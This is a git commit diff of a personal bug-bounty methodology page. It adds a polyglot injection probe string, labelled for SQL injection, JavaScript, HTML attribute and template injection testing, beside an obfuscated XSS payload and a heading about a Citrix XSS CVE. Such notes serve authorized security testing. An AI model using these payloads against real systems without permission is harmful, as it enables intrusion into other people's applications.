GITBOOK-76: change request with no subject merged in GitBook

This commit is contained in:
Xalgord 2023-08-16 18:29:41 +00:00 committed by gitbook-bot
parent 2a7bf0e9e6
commit dcea489766
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF

View file

@ -2,7 +2,7 @@
description: 'description: For Personal Reference'
---
# My Methodologies
# 🧑🏫 My Methodologies
* https://github.com/maurosoria/dirsearch
* https://github.com/MobSF/Mobile-Security-Framework-MobSF
@ -375,6 +375,22 @@ GET /?q=xss POST /q=xss
<iMg src%3dN onerror%3dalert(0x000D98)>
```
### Throw this into EVERY parameter you see
```
'"`><img src=x>${{7*7}}
```
```
'"` =====> SQLi testing
'"` ======> JS inject
'"`> ======> html tag attribute inject
<img src=x> =====> html inject
${{7*7}} ======> CSTI
```
by @theXSSrat
#### Nuclei CVE-2023-24488 Citrix XSS - Easy Bug Bounty
**Command**:\